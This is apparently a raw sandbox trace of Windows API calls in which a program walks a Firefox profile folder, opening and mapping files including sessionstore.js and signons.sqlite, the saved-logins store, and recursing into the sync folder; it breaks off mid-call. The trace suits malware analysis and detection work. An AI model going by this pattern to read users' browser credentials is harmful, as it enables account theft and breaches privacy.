[0589.830] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.830] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0589.830] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.830] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.830] CloseHandle (hObject=0x5ac) returned 1 [0589.830] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0589.830] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.831] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0589.831] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.831] CloseHandle (hObject=0x5ac) returned 1 [0589.831] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.831] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0589.831] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.831] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.831] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.831] CloseHandle (hObject=0x4c8) returned 1 [0589.831] CloseHandle (hObject=0x5ac) returned 1 [0589.831] LocalFree (hMem=0x56c300) returned 0x0 [0589.831] LocalFree (hMem=0x56afc8) returned 0x0 [0589.831] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.831] lstrlenW (lpString="\\") returned 1 [0589.831] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.831] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.831] lstrlenW (lpString="sessionstore.js") returned 15 [0589.831] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.831] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56afc8 [0589.831] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.831] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.832] CloseHandle (hObject=0x5ac) returned 1 [0589.832] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0589.832] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56c300 [0589.832] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x56c300, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0589.832] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.832] CloseHandle (hObject=0x5ac) returned 1 [0589.832] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.832] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0589.832] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.832] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.832] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.832] CloseHandle (hObject=0x4c8) returned 1 [0589.832] CloseHandle (hObject=0x5ac) returned 1 [0589.832] LocalFree (hMem=0x56c300) returned 0x0 [0589.832] LocalFree (hMem=0x56afc8) returned 0x0 [0589.832] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.832] lstrlenW (lpString="\\") returned 1 [0589.832] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.832] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.832] lstrlenW (lpString="signons.sqlite") returned 14 [0589.833] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.833] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0589.833] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.833] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.833] CloseHandle (hObject=0x5ac) returned 1 [0589.833] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0589.833] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c300 [0589.833] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x56c300, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0589.833] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.833] CloseHandle (hObject=0x5ac) returned 1 [0589.833] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.833] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0589.833] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.833] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0589.835] UnmapViewOfFile (lpBaseAddress=0x24c0000) returned 1 [0589.836] CloseHandle (hObject=0x4c8) returned 1 [0589.836] CloseHandle (hObject=0x5ac) returned 1 [0589.836] LocalFree (hMem=0x56c300) returned 0x0 [0589.836] LocalFree (hMem=0x56afc8) returned 0x0 [0589.836] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.836] lstrlenW (lpString="\\") returned 1 [0589.836] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.836] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.836] lstrlenW (lpString="times.json") returned 10 [0589.836] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.836] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x578b10 [0589.836] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.836] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.836] CloseHandle (hObject=0x5ac) returned 1 [0589.836] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0589.836] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x59a8a0 [0589.836] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x59a8a0, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0589.836] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.836] CloseHandle (hObject=0x5ac) returned 1 [0589.836] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.836] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0589.837] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.837] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.837] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.837] CloseHandle (hObject=0x4c8) returned 1 [0589.837] CloseHandle (hObject=0x5ac) returned 1 [0589.837] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.837] LocalFree (hMem=0x578b10) returned 0x0 [0589.837] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.837] lstrlenW (lpString="\\") returned 1 [0589.837] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.837] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.837] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0589.837] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.837] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x578b10 [0589.837] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.837] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.837] CloseHandle (hObject=0x5ac) returned 1 [0589.837] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0589.837] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x59a8a0 [0589.837] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x59a8a0, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0589.837] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.837] CloseHandle (hObject=0x5ac) returned 1 [0589.837] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.838] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0589.838] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.838] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.838] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.838] CloseHandle (hObject=0x4c8) returned 1 [0589.838] CloseHandle (hObject=0x5ac) returned 1 [0589.838] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.838] LocalFree (hMem=0x578b10) returned 0x0 [0589.838] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.838] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0589.838] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0589.838] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.838] lstrlenW (lpString="\\") returned 1 [0589.838] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.838] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.838] lstrlenW (lpString="weave") returned 5 [0589.838] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.838] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x578b10 [0589.838] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.838] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.838] lstrlenW (lpString="\\*.*") returned 4 [0589.838] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.838] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x59a8a0 [0589.838] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0x57ca60 [0589.838] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.838] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.839] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.839] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.839] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.839] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0589.839] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.839] lstrlenW (lpString="\\") returned 1 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.839] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c40 [0589.839] lstrlenW (lpString="changes") returned 7 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.839] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.839] LocalFree (hMem=0x578c40) returned 0x0 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0589.839] lstrlenW (lpString="\\*.*") returned 4 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0589.839] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.839] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0x57c9a0 [0589.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.839] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 1 [0589.839] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.839] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.839] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0 [0589.839] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.839] LocalFree (hMem=0x56c300) returned 0x0 [0589.839] LocalFree (hMem=0x56afc8) returned 0x0 [0589.839] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.839] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0589.839] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.839] lstrlenW (lpString="\\") returned 1 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.839] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c40 [0589.839] lstrlenW (lpString="failed") returned 6 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.839] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56afc8 [0589.839] LocalFree (hMem=0x578c40) returned 0x0 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0589.839] lstrlenW (lpString="\\*.*") returned 4 [0589.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0589.839] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.839] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0x57c9a0 [0589.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.839] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 1 [0589.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.840] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0 [0589.840] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.840] LocalFree (hMem=0x56c300) returned 0x0 [0589.840] LocalFree (hMem=0x56afc8) returned 0x0 [0589.840] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.840] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0589.840] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.840] lstrlenW (lpString="\\") returned 1 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0589.840] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c40 [0589.840] lstrlenW (lpString="toFetch") returned 7 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0589.840] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.840] LocalFree (hMem=0x578c40) returned 0x0 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0589.840] lstrlenW (lpString="\\*.*") returned 4 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0589.840] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.840] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0x57c9a0 [0589.840] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.840] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 1 [0589.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.840] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db0c | out: lpFindFileData=0x52db0c) returned 0 [0589.840] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0589.840] LocalFree (hMem=0x56c300) returned 0x0 [0589.840] LocalFree (hMem=0x56afc8) returned 0x0 [0589.840] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0 [0589.840] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.840] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.840] LocalFree (hMem=0x578b10) returned 0x0 [0589.840] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.840] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0589.840] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0589.840] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.840] lstrlenW (lpString="\\") returned 1 [0589.840] lstrlenW 